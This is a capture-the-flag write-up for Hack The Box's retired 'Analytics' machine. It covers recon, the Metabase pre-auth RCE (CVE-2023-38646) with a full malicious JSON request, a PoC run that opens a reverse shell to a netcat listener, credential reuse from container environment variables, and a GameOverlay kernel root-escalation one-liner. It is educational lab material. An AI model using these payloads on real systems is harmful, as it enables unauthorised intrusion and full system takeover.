Analytics
Date: 24 March 2024
This writeup meets HTB's ToS as this solution is published after the machine is retired (or expired). This means that following this writeup won't count towards the seasonal points.
Summary
Analytics is an easy difficulty Linux machine with exposed HTTP and SSH services. Enumeration of the website reveals a Metabase instance, which is vulnerable to Pre-Authentication Remote Code Execution (CVE-2023-38646), which is leveraged to gain a foothold inside a Docker container. Enumerating the Docker container we see that the environment variables set contain credentials that can be used to SSH into the host. Post-exploitation enumeration reveals that the kernel version that is running on the host is vulnerable to GameOverlay, which is leveraged to obtain root privileges.
Recon:
Begin by running a basic Nmap port scan:
sudo nmap -T3 10.10.11.233
...
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
...
After attempting to load http://10.10.11.233, notice that it tried to resolve analytical.htb, so add this to the /etc/hosts file:
echo "10.10.11.233 analytical.htb" | sudo tee -a /etc/hosts
Attempted to fuzz for any subdomains:
ffuf -u http://10.10.11.233 -H "Host: FUZZ.analytical.htb" -w subdomains-top1million-20000.txt
...
data [Status: 200, Size: 77883, Words: 3574, Lines: 28, Duration: 186ms]
...
I also added this to my /etc/hosts file:
echo "10.10.11.233 data.analytical.htb" | sudo tee -a /etc/hosts
You can continue enumerating by directory fuzzing, although by exploring the site you can find a login link to data.analytical.htb/auth/login. This leads to a login page.
A quick Google search for metabase exploit leads to the article Chaining our way to Pre-Auth RCE in Metabase (CVE-2023-38646).
Weaponisation:
Essentially, Shubham and their team found that as part of the setup process setup-token is generated and should be wiped post-installation. However, this was not wiped and any unauthenticated user can access the value of the token either by:
- Viewing the embedded JSON object in source code under (in this case)
data.analytical.htb/auth/login. - Viewing the token under
/api/session/properties.
With this token, a POST request can be made to /api/setup/validate with a malicious db connection that allows for the execution of arbitrary commands via SQLi which can lead to RCE.
First, obtain the setup-token:
curl data.analytical.htb/api/session/properties -s | jq -r '."setup-token"'
249fa03d-fd94-4d5b-b94f-b4ebf3df681f
Then modify the payload created by Shubham and their team to exploit:
POST /api/setup/validate HTTP/1.1
Host: localhost
Content-Type: application/json
Content-Length: 566
{
"token": "249fa03d-fd94-4d5b-b94f-b4ebf3df681f",
"details":
{
"is_on_demand": false,
"is_full_sync": false,
"is_sample": false,
"cache_ttl": null,
"refingerprint": false,
"auto_run_queries": true,
"schedules":
{},
"details":
{
"db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;TRACE_LEVEL_SYSTEM_OUT=1\\;CREATE TRIGGER IAMPWNED BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\nnew java.net.URL('https://example.com/pwn134').openConnection().getContentLength()\n$$--=x\\;",
"advanced-options": false,
"ssl": true
},
"name": "an-sec-research-team",
"engine": "h2"
}
}
I created a PoC for this which can automatically retrieve the setup-token exploit the vulnerability to achieve RCE:
# Setup listener
nc -lnvp 9001
# Exploit CVE-2023-38646
python3 CVE-2023-38646.py --lhost {KALI_IP} --lport {KALI_LISTENING_PORT} --url http://{DOMAIN_OF_LOGIN_PAGE}
# Example:
python3 CVE-2023-38646.py --lhost 10.10.14.30 --lport 9001 --url http://data.analytical.htb
Looking for token...
Found! Setup Token: 249fa03d-fd94-4d5b-b94f-b4ebf3df681f
Executing with URL: http://data.analytical.htb/api/setup/validate
... please wait
POST request made!
Make sure you have set up a listening port on your local machine to test effectiveness
listening on [any] 9001 ...
connect to [10.10.14.30] from (UNKOWN) [10.10.11.223] 35206
...
You can download my CVE-2023-38646 PoC on GitHub.
Metasploit also has the module exploit/linux/http/metabase/_setup_token_rce which can be used instead.
With RCE, we can then begin system enumeration.
Enumeration
Running ls -a we can see that it appears we are in a container:
ls -a
.
..
.dockerenv
...
But by executing env to show the environment variables, we find:
env
...
META_USER=metalytics
META_PASS={REDACTED}
...
Using this login, we can SSH into the host machine and retrieve the flag:
ssh [email protected] {PASWORD REDACTED}
cat user.txt
{USER FLAG REDACTED}
Privilege Escalation:
We can enumerate the kernel version:
uname -a
Linux analytics 6.2.0-25-generic #25~22.04.2-Ubuntu SMP PREEMPT_DYNAMIC...
And then search online for 6.2.0-25-generic #25~22.04.2-Ubuntu CVE. This leads to finding a vulnerability called GameOverlay. There is also a payload shared on X for this exploit.
The payload shared on X by Liad Eliyahu can be modified as per the below to obtain a shell that is escalated to root:
unshare -rm sh -c "mkdir l u w m && cp /u*/b*/p*3 l/; setcap cap_setuid+eip l/python3;mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/*;" && u/python3 -c 'import os;os.setuid(0);os.system("rm -rf l m u w; bash")'
Then read the root flag:
cat root.txt
This is a dense payload but 0xRave breaks down the command very well in their article. If you prefer a video format, take a look at 0xdf's explanation on YouTube.